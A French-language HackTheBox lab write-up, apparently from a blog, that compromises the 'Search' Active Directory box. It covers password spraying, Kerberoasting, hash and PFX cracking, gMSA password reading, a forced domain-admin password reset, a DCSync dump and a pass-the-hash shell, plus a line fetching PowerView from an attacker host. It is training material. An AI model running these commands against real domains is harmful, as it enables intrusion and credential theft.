HackTheBox - Search

Posted on Sat, Apr 30, 2022 Active Directory ADCS Kerberoasting Password re-use gMSA Password PSWA Powershell

Info Card

Port Scanning

➤ nmap -T5 -sCV -p- 10.10.11.129 -Pn

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
| http-methods:
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-17 13:27:09Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-17T13:28:46+00:00; -1h43m08s from scanner time.
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
| tls-alpn:
|_  http/1.1
|_http-title: Search — Just Testing IIS
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-17T13:28:46+00:00; -1h43m08s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-04-17T13:28:47+00:00; -1h43m08s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-17T13:28:46+00:00; -1h43m08s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-17T13:28:47+00:00; -1h43m08s from scanner time.
8172/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after:  2030-04-05T09:05:25
| tls-alpn:
|_  http/1.1
|_ssl-date: 2022-04-17T13:28:45+00:00; -1h43m08s from scanner time.
|_http-title: Site doesn't have a title.
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  tcpwrapped
49667/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49695/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  tcpwrapped
49707/tcp open  tcpwrapped
49710/tcp open  msrpc         Microsoft Windows RPC
49719/tcp open  tcpwrapped
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
|_clock-skew: mean: -1h43m08s, deviation: 0s, median: -1h43m08s
| smb2-time:
|   date: 2022-04-17T13:28:09
|_  start_date: N/A

Web enumeration, information disclosure

Nous pouvons énumérer les fichiers/répertoires sur le serveur web

Il y a un /staff mais malheureusement nous n’y avons pas accès.

Il y’a une image avec des inscriptions sur le serveur web

Regardons de plus près /images/slide_2.jpg

Le mot de passe de Hope Sharp est divulgé: IsolationIsKey?

Sauf que bien évidemment le nom d’utilisateur n’est pas ‘Hope Sharp’

➤ cme ldap 10.10.11.129 -d search.htb -u 'Hope Sharp' -p 'IsolationIsKey?'
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Hope Sharp:IsolationIsKey?

Generate custom wordlist + Password Spraying

Nous pouvons tester de générer une custom liste d’utilisateurs à partir de Hope Sharp

cat -p -n user.lst
   1 Hope Sharp
   2 Sharp Hope
   3 HopeSharp
   4 HopeSharp2021
   5 HopeSharp2022
   6 h.sharp
   7 sharp.h
   8 hope
   9 sharp
  10 Hope
  11 Sharp
  12 hope.s
  13 Hope.Sharp
  14 hope.sharp
  15 h.Sharp
  16 Hope.S

Essayons de password spray avec cette liste d’utilisateur générée à la main:

➤ cme ldap 10.10.11.129 -d search.htb -u user.lst -p 'IsolationIsKey?' --continue-on-success

SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Hope Sharp:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Sharp Hope:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\HopeSharp:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\HopeSharp2021:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\HopeSharp2022:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\h.sharp:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\sharp.h:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\hope:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\sharp:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Hope:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Sharp:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\hope.s:IsolationIsKey?
LDAP        10.10.11.129    389    RESEARCH         [+] search.htb\Hope.Sharp:IsolationIsKey?
LDAP        10.10.11.129    389    RESEARCH         [+] search.htb\hope.sharp:IsolationIsKey?
LDAP        10.10.11.129    389    RESEARCH         [-] search.htb\h.Sharp:IsolationIsKey?
LDAP        10.10.11.129    389    RESEARCH         [-] search.htb\Hope.S:IsolationIsKey?
LDAP        10.10.11.129    389    RESEARCH         [-] search.htb\:IsolationIsKey?

Nous avons compromis un compte de domaine: search.htb\Hope.Sharp:IsolationIsKey?

On peu désormais tenter plusieur types d’attaques

Kerberoasting

➤ net time -S 10.10.11.129
Sun Apr 17 13:53:08 2022

➤ faketime '2022-04-17 13:55:00' cme ldap 10.10.11.129 -d search.htb -u Hope.Sharp -p 'IsolationIsKey?' --kerberoast krb5-tgs.txt
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.129    389    RESEARCH         [+] search.htb\Hope.Sharp:IsolationIsKey?
LDAP        10.10.11.129    389    RESEARCH         [*] Total of records returned 4
LDAP        10.10.11.129    389    RESEARCH         sAMAccountName: web_svc memberOf:  pwdLastSet: 2020-04-09 12:59:11.329031 lastLogon:<never>
LDAP        10.10.11.129    389    RESEARCH         $krb5tgs$23$*web_svc$SEARCH.HTB$RESEARCH/web_svc.search.htb~60001*$4c1cf7c79f35e86aa4cd7a7ae496fa27$4279de8172dec881fa90a3b2fd733e3533f1f7fca5dbfd70be34b6d4ee3a0c7b817111ac36b1c6af1617785d4281448fe89ac66e66e2fdcb5ddacf84e5b0af93c0110b5a7b0bde9f77ffa28216ea6c08a1c00b24d57d307483a0c69f85fff93c9614715a2bb4d0307f8dba99f8c6734e27f325955908d7e61e28f3658cc481c9f044d79aff1368ce75e6416b619bae4d48ce1ffb1dac8d23019667fc9d3c130e0298cf7b2b8079d4413738611b4d112567fb10336705ab0aa3dec0a81aeee9b30fcbe72f8b90d5f20726de69ff2627de9010a0e79b9f48d1287594cba2f7bb851b04904673ab2b50d40e3dd3cf0ed96f75c01e8ac2706fdc15f19aa8177a9b5b4a118f76430186f31b75f90b427a8becbbd7fcc44ed827570d51fc175ddbd1ff94234cde2a477cd93c11154a04fe07eed53b5010245a28c36f9aec14bf4f2509e878a901f90aaf01b45dbb3130c30dadeb9122a85c4113ae32f34934cb01cc7b0468d8bde0d94b074e95c489520f7909b23c22b70b6bd767c7b40e98efe6b22cf4f5c5ebe5bdfd7f79b1250afbf1053284db05e9ec81b99400c5420a059afbfbf303747825fb4ec7a85aa902c2e874af9bfdfaf4c9a8520684c4242c3d2845dc9180faf0e86b371e36da67949f6eac58c7bfb37720090eaabfc48dd54126b9a581766d965af19fee5ba7bb6b79ff276ec99389de5b4c698d85e427f956b885e300a2982caffc9efa02d6309bc2e6f1d0e347ee6ab449e328c40ff6285e660961c56ba39b527297f80e9fcbc50d4d6ce379c0b4ffe4b60b38cf92bd061729eff9c3bad38399e27a0dd8e7873346d6f55da260fb40d465fbd0706343a513d71f452f86f7b66bfbf92ec0129f462dd5bf1bc36242ac5f8ae1c4bdd808cf79c51567c35ddb53fe822c0bdd1904707f8efe4a619f4adf544850da3121573cf1a8d399b8dc730ced15a10238205ebe5491662376c2ca434555eedb5f4e6164d32d6fff67c002ed138e759015a1b0467fc41baa5d85b681e6d1641e74fc2dba238265554bf639dd47be5b18bde0e96c1ef0a96d37a99e69a166f81b599749ec518c08f787f78e6f37577b373297c85668098050bcd8abdb1d81d8c34815abd6750f2ecf55e9d0fb0fd11c3c9dd8ae47e831fd07479a89ed0418c70a48103cffbea651cc26ea6a4c4c11253d7159061a9b6839b0d0a21e0da3c710907f207489d98c32682897f5974d6cfddf5801652c411b98c2aeeba0fae1f730774afb03247527556637e367edf0dd3980d456ac4905e96bfc10634bcfaf4c2e4c95dc6e7c2e9d171835e58742b2db6b3fc86dafbfa017680f5e3b4d038fa74ddbcbdbcaee424039b476970e4634f6df5674df15b25930ab48257217b01f1a4817c53ec64a1ad45c40f5d15988c62025a5d8b80f3fc759dca5681abcdd75f3dfec011aff69d570d619cdab7409d907836038cb89f66176bbb00d7097a0ae

Nous récupérons le tgs de web_svc qui est un compte de service, nous pouvons tenter de crack le hash.

➤ john krb5-tgs.txt --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --format=krb5tgs

àUsing default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 0,02% (ETA: 17:18:12) 0g/s 0p/s 0c/s 0C/s
@3ONEmillionbaby (?)
1g 0:00:00:11 DONE (2022-04-17 15:41) 0.09033g/s 1038Kp/s 1038Kc/s 1038KC/s @4208891ncv..=123jacko
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Cela à fonctionner avec succès nous récupérons le mot de passe du compte de service: web_svc:@3ONEmillionbaby

➤ cme ldap 10.10.11.129 -d search.htb -u 'web_svc' -p '@3ONEmillionbaby'
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.129    389    RESEARCH         [+] search.htb\web_svc:@3ONEmillionbaby

La target semble vulnérable à ms16-068 , mais cela ne sera pas utile car le ticket recu n’est pas intéréssant pour web_svc, car aucun service n’est à sa disposition.

faketime '2022-04-17 15:50:00' goldenPac.py -dc-ip 10.10.11.129 search.htb/web_svc:'@3ONEmillionbaby'@RESEARCH.SEARCH.HTB
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] User SID: S-1-5-21-271492789-1610487937-1871574529-1296
[*] Forest SID: S-1-5-21-271492789-1610487937-1871574529
[*] Attacking domain controller 10.10.11.129
[*] 10.10.11.129 found vulnerable!

Password re-use

Avec les utilisateurs récupéré sur le smb nous sommes en mesure d’appronfondire notre énumération

cat -p users.lst

abril.suarez
Angie.Duffy
Antony.Russo
belen.compton
Cameron.Melendez
chanel.bell
Claudia.Pugh
Cortez.Hickman
dax.santiago
Eddie.Stevens
edgar.jacobs
Edith.Walls
eve.galvan
frederick.cuevas
hope.sharp
jayla.roberts
Jordan.Gregory
payton.harmon
Reginald.Morton
santino.benjamin
Savanah.Velazquez
sierra.frye
trace.ryan

On peu chercher des utilisateurs faisant du password reuse

➤ cme ldap 10.10.11.129 -d search.htb -u users.lst -p '@3ONEmillionbaby'

SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\abril.suarez:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Angie.Duffy:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Antony.Russo:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\belen.compton:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Cameron.Melendez:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\chanel.bell:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Claudia.Pugh:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Cortez.Hickman:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\dax.santiago:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Eddie.Stevens:@3ONEmillionbaby
LDAP        10.10.11.129    389    RESEARCH         [+] search.htb\edgar.jacobs:@3ONEmillionbaby

edgar.jacobs à le même mot de passe que web_svc

➤ cme smb 10.10.11.129 -d search.htb -u edgar.jacobs -p '@3ONEmillionbaby' --shares

SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [+] search.htb\edgar.jacobs:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [+] Enumerated shares
SMB         10.10.11.129    445    RESEARCH         Share           Permissions     Remark
SMB         10.10.11.129    445    RESEARCH         -----           -----------     ------
SMB         10.10.11.129    445    RESEARCH         ADMIN$                          Remote Admin
SMB         10.10.11.129    445    RESEARCH         C$                              Default share
SMB         10.10.11.129    445    RESEARCH         CertEnroll      READ            Active Directory Certificate Services share
SMB         10.10.11.129    445    RESEARCH         helpdesk        READ
SMB         10.10.11.129    445    RESEARCH         IPC$            READ            Remote IPC
SMB         10.10.11.129    445    RESEARCH         NETLOGON        READ            Logon server share
SMB         10.10.11.129    445    RESEARCH         RedirectedFolders$ READ,WRITE
SMB         10.10.11.129    445    RESEARCH         SYSVOL          READ            Logon server share

On peu se connecter sur le smb avec ses credentials et aller voir son répertoire courant

➤ smbclient.py htb.local/'edgar.jacobs':'@3ONEmillionbaby'@search.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Type help for list of commands
# use RedirectedFolders$
# cd edgar.jacobs
# ls
drw-rw-rw-          0  Thu Apr  9 20:04:11 2020 .
drw-rw-rw-          0  Thu Apr  9 20:04:11 2020 ..
drw-rw-rw-          0  Mon Aug 10 10:02:16 2020 Desktop
drw-rw-rw-          0  Mon Aug 10 10:02:17 2020 Documents
drw-rw-rw-          0  Mon Aug 10 10:02:17 2020 Downloads
# cd Desktop
# ls
drw-rw-rw-          0  Mon Aug 10 10:02:16 2020 .
drw-rw-rw-          0  Mon Aug 10 10:02:16 2020 ..
drw-rw-rw-          0  Thu Apr  9 20:05:29 2020 $RECYCLE.BIN
-rw-rw-rw-        282  Mon Aug 10 10:02:16 2020 desktop.ini
-rw-rw-rw-       1450  Thu Apr  9 20:05:03 2020 Microsoft Edge.lnk
-rw-rw-rw-      23130  Mon Aug 10 10:30:05 2020 Phishing_Attempt.xlsx
# mget Phishing_Attempt.xlsx

Sensitive Information Disclosure through excel binder

Il y’a un fichier Phishing_Attempt.xlsx qui n’est rien d’autre qu’un classeur Excel. On pourra l’ouvrir avec LibreOffice.

C’est un fichier qui décrit les statistiques par rapport au nombre de mots de passe capturé par année via les attaques phishing, il y’a une autre page que nous pouvons regarder.

Il y’a des informations à propos d’autres utilisateurs. Quand j’éssaye de bouger la taille des cellules pour voir si il n’y a pas d’informations cachés je me fait bloquer car elle sont protégées

Nous pouvons tout selectioner en cliquant sur le petit carré en haut à gauche

Plus qu’a copié + coller sans formatage pour voir si on arrive a trouver d’autre informations

firstname lastname password Username
Payton Harmon    ;;36!cried!INDIA!year!50;;    Payton.Harmon

Cortez Hickman    ..10-time-TALK-proud-66..    Cortez.Hickman

Bobby Wolf      ??47^before^WORLD^surprise^91??     Bobby.Wolf

Margaret Robinson    //51+mountain+DEAR+noise+83//   Margaret.Robinson 

Scarlett Parks    ++47|building|WARSAW|gave|60++    Scarlett.Parks

Eliezer Jordan   !!05_goes_SEVEN_offer_83!!     Eliezer.Jordan

Hunter Kirby    ~~27%when%VILLAGE%full%00~~    Hunter.Kirby

Sierra Frye    $$49=wide=STRAIGHT=jordan=28$$18    Sierra.Frye

Annabelle Wells    ==95~pass~QUIET~austria~77==    Annabelle.Wells

Eve Galvan    //61!banker!FANCY!measure!25//    Eve.Galvan

Jeramiah Fritz     ??40:student:MAYOR:been:66??    Jeramiah.Fritz

Abby Gonzalez     &&75:major:RADIO:state:93&&    Abby.Gonzalez 

Joy Costa    **30*venus*BALL*office*42**    Joy.Costa

Vincent Sutton   **24&moment&BRAZIL&members&66**      Vincent.Sutton

Ce qui est le cas, nous sommes en mesure de voir leurs mots de passe.

Nous pouvons tenter de spray, pour voir si les mots de passes sont bien valides.

➤ cme ldap 10.10.11.129 -d search.htb -u offuser.lst -p offpass.txt --continue-on-success --no-bruteforce

SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Payton.Harmon:;;36!cried!INDIA!year!50;;
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Cortez.Hickman:..10-time-TALK-proud-66..
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Bobby.Wolf:??47^before^WORLD^surprise^91??
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Margaret.Robinson://51+mountain+DEAR+noise+83//
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Scarlett.Parks:++47|building|WARSAW|gave|60++
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Eliezer.Jordan:!!05_goes_SEVEN_offer_83!!
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Hunter.Kirby:~~27%when%VILLAGE%full%00~~
LDAP        10.10.11.129    389    RESEARCH         [+] search.htb\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18
LDAP        10.10.11.129    389    RESEARCH         [-] search.htb\Annabelle.Wells:==95~pass~QUIET~austria~77==
LDAP        10.10.11.129    389    RESEARCH         [-] search.htb\Eve.Galvan://61!banker!FANCY!measure!25//
LDAP        10.10.11.129    389    RESEARCH         [-] search.htb\Jeramiah.Fritz:??40:student:MAYOR:been:66??
LDAP        10.10.11.129    389    RESEARCH         [-] search.htb\Abby.Gonzalez:&&75:major:RADIO:state:93&&
LDAP        10.10.11.129    389    RESEARCH         [-] search.htb\Joy.Costa:**30*venus*BALL*office*42**
LDAP        10.10.11.129    389    RESEARCH         [-] search.htb\Vincent.Sutton:**24&moment&BRAZIL&members&66**

Nous avons pwn l’utilisateur Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18

Access on PSWA as Sierra.Frye with PFX file

Nous pouvons accéder aux shares avec et récupérer le user flag

smbclient.py htb.local/'Sierra.Frye':'$$49=wide=STRAIGHT=jordan=28$$18'@search.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Type help for list of commands
# use RedirectedFolders$
# mget user.txt
[*] Downloading user.txt

Dans le répertoire de Sierre.Frye nous pouvons récupérer un fichier pfx qui va nous servir pour accéder au PSWA (PowerShell Web Access) sur /staff

smb: \sierra.frye\Downloads\Backups\> ls
  .                                 DHc        0  Mon Aug 10 20:39:17 2020
  ..                                DHc        0  Mon Aug 10 20:39:17 2020
  search-RESEARCH-CA.p12             Ac     2643  Fri Jul 31 15:04:11 2020
  staff.pfx                          Ac     4326  Mon Aug 10 20:39:17 2020

smb: \sierra.frye\Downloads\Backups\> mget staff.pfx

Pour cela nous allons inclure le PFX file dans firefox en tant que certificat

Crack PFX File

Mais tout d’abord nous avons besoin du mot de passe d’importation du fichier au format PKCS#12 . Pour cela je vais utiliser crackpkcs12, pour tenter de le crack.

➤ crackpkcs12 -d $(locate rockyou.txt| tail -n1) staff.pfx

Dictionary attack - Starting 12 threads

*********************************************************
Dictionary attack - Thread 1 - Password found: misspissy
*********************************************************

Import certificate in Firefox

Super ! Nous pouvons importer le fichier pfx sur Firefox pour l’utiliser en tant que certificat:

Nous pouvons accéder au /staff via le certificat, désormais nous avons la possibilité de nous connecter avec les creds de Sierra.Frye sur le PSWA

BloodHound enumeration

Nous pouvons faire un bloohdhound avec les creds de Sierra:

bloodhound-python -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d search.htb -v --zip -c All,Loggedon -dc search.htb -ns 10.10.11.129

L’utilisateur qu’on a compromis (Sierra.Frye) est membre du groupe BIRMINGHAM-ITSEC , ce dernier est membre du groupe ITSEC.

ITSEC a la permissions de ReadGMSAPassword sur l’objet BIR-ADFS-GMSA.

BIR-ADFS-GMSA a les droits GenericAll sur l’utilisateur Tristan.Davies.

Tristan.Davies étant Domain Admins.

Read gMSA Password

Nous pouvons utiliser le tool gMSADumper pour obtenir le hash nt de BIR-ADFS-GMSA$

➤ python3 gMSADumper.py -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d 'search.htb'
Users or groups who can read password for BIR-ADFS-GMSA$:
 > ITSec
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f

Create PS-Credential object with gMSA password

$gmsa = Get-ADServiceAccount -Identity BIR-ADFS-GMSA -properties msds-ManagedPassword # Read LDAP attribute
$mp = $gmsa.'msDS-ManagedPassword' # Read gMSA Password
$securestring = ConvertFrom-ADManagedPasswordBlob $mp # Convert password Blob to Secure String
$cred = New-Object System.Management.Automation.PSCredential('SEARCH\BIR-ADFS-GMSA', $securestring.SecureCurrentPassword) # Create PS-Credential object
Retrieving Cleartext GMSA Passwords from Active Directory

Have you ever wondered how the automatically generated passwords of Group Managed Service Accounts (GMSA) look like? Well, you can fetch them from Active Directory in the same way as Windows Servers do and see yourself. Here is how: Creating a GMSA To start experimenting, we need to have a GMSA first, so we create one:...

Force change password with GenericAll rights

Invoke-WebRequest -Uri "http://10.10.14.11/PowerView-ofs.ps1" -OutFile "C:\Users\Sierra.Frye\Documents\PowerView-ofs.ps1"
ipmo .\PowerView-ofs.ps1

$UserPassword = ConvertTo-SecureString 'Ilove4!' -AsPlainText -Force
Set-DomainUserPassword -Identity Tristan.Davies -AccountPassword $UserPassword -Credential $cred

DCSync attack

➤ secretsdump.py 'Tristan.Davies':'Ilove4!'@search.htb

Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x697a8e5d7f1607bd69d577ff42336dd5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9c7bf72260e8eef29e9cfeb60f94fc56:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cd69d23e4383daa5b0f42d29dba9529a:::
➤ wmiexec.py search.htb/'Administrator'@10.10.11.129 -hashes ':5e3c0abbe0b4163c5612afe25c69ced6'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
search\administrator